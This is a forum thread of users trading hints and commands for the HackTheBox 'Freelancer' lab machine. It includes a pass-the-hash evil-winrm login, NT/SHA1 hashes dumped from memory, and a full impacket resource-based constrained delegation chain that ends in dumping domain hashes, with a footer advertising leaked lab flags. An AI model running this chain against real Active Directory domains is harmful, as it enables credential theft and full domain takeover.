Possibly Related Threads…

osamy7593 · 06-04-2024, 10:36 AM

evil-winrm -i x.x.x.x -u Administrator -H 0039318f1e8274633445bce32ad1a290

j868K3792 · 06-04-2024, 11:19 AM

Well, secretsdump can work and can not work. Just 20 attempts and I got all hashes. Weird stuff.

standby123 · 06-04-2024, 12:27 PM

Guys I was able to extract the nt hash for the user liza.kazanof from memory.dmp but it useless
== MSV ==
Username: liza.kazanof
Domain: FREELANCER
LM: NA
NT: 6bc05d2a5ebf34f5b563ff233199dc5a
SHA1: 93eff904639f3b40b0f05f9052c48473ecd2757e

Did I miss something

standby123 · 06-04-2024, 07:44 PM

(06-04-2024, 12:27 PM)standby123 Wrote: Guys I was able to extract the nt hash for the user liza.kazanof from memory.dmp but it useless
== MSV ==
Username: liza.kazanof
Domain: FREELANCER
LM: NA
NT: 6bc05d2a5ebf34f5b563ff233199dc5a
SHA1: 93eff904639f3b40b0f05f9052c48473ecd2757e

Did I miss something

I found the password for the user lorra199 for those who struggling to get it check the hive registry in the dump

dino434343 · 06-05-2024, 12:01 AM

(06-04-2024, 07:44 PM)standby123 Wrote:
(06-04-2024, 12:27 PM)standby123 Wrote: Guys I was able to extract the nt hash for the user liza.kazanof from memory.dmp but it useless
== MSV ==
Username: liza.kazanof
Domain: FREELANCER
LM: NA
NT: 6bc05d2a5ebf34f5b563ff233199dc5a
SHA1: 93eff904639f3b40b0f05f9052c48473ecd2757e

Did I miss something

I found the password for the user lorra199 for those who struggling to get it check the hive registry in the dump

how do i get the sql terminal to run

standby123 · 06-05-2024, 12:48 PM

(06-05-2024, 12:01 AM)dino434343 Wrote:
(06-04-2024, 07:44 PM)standby123 Wrote:
(06-04-2024, 12:27 PM)standby123 Wrote: Guys I was able to extract the nt hash for the user liza.kazanof from memory.dmp but it useless
== MSV ==
Username: liza.kazanof
Domain: FREELANCER
LM: NA
NT: 6bc05d2a5ebf34f5b563ff233199dc5a
SHA1: 93eff904639f3b40b0f05f9052c48473ecd2757e

Did I miss something

I found the password for the user lorra199 for those who struggling to get it check the hive registry in the dump

how do i get the sql terminal to run

you have first to get the admin user via qr code (IDOR)

octubrerojo · 06-05-2024, 09:43 PM

Awesome machine. Completed the root with impacket, no need to disable AV.
Just use RCBD for AD, add a computer if needed, they have by default SPN.

mongocrypt · (This post was last modified: 06-06-2024, 10:03 PM by mongocrypt.)

addcomputer.py -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host freelancer.htb -domain-netbios freelancer.htb freelancer.htb/lorra199:'pass lorra''

sudo rdate -n freelancer.htb && impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate 'Administrador' 'freelancer/attackersystem$:Summer2018!' -dc-ip dc.freelancer.htb
impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'DC$' -dc-ip 10.xx.xx.xx-action 'write' 'freelancer.htb/lorra199:pass lorra'
sudo rdate -n freelancer.htb && getST.py -spn 'cifs/DC.freelancer.htb' -impersonate Administrator -dc-ip 10.xx.xx.xx 'freelancer.htb/ATTACKERSYSTEM$:Summer2018!'

export KRB5CCNAME='Administrator.ccache'

secretsdump.py 'freelancer.htb/Administrator@DC.freelancer.htb' -k -no-pass -dc-ip 10.xx.xx.xx -target-ip 10.xx.xx.xx-just-dc-ntlm

evil-winrm -i 10.xx.xx.xx -u 'Administrator' -H <hash>

Dumbdev · 06-07-2024, 02:10 AM

Show's no error but still got flagged by AMSI

anon912039120 · 06-08-2024, 12:46 PM

This machine was really fun

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	360	88,710	03-28-2026, 09:28 AM Last Post: catsweet
	[FREE] HTB-ProLabs APTLABS Just Flags	kewlsunny	23	2,348	03-28-2026, 03:30 AM Last Post: lulaladrow
	[MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot	htb-bot	87	7,490	03-27-2026, 07:22 PM Last Post: stn
	HTB Eloquia User and Root Flags - Insane Box	69646B	13	350	03-27-2026, 06:14 PM Last Post: vlxw
	HTB - ALL Challenges you Stuck in	osamy7593	2	646	03-27-2026, 04:24 PM Last Post: catsweet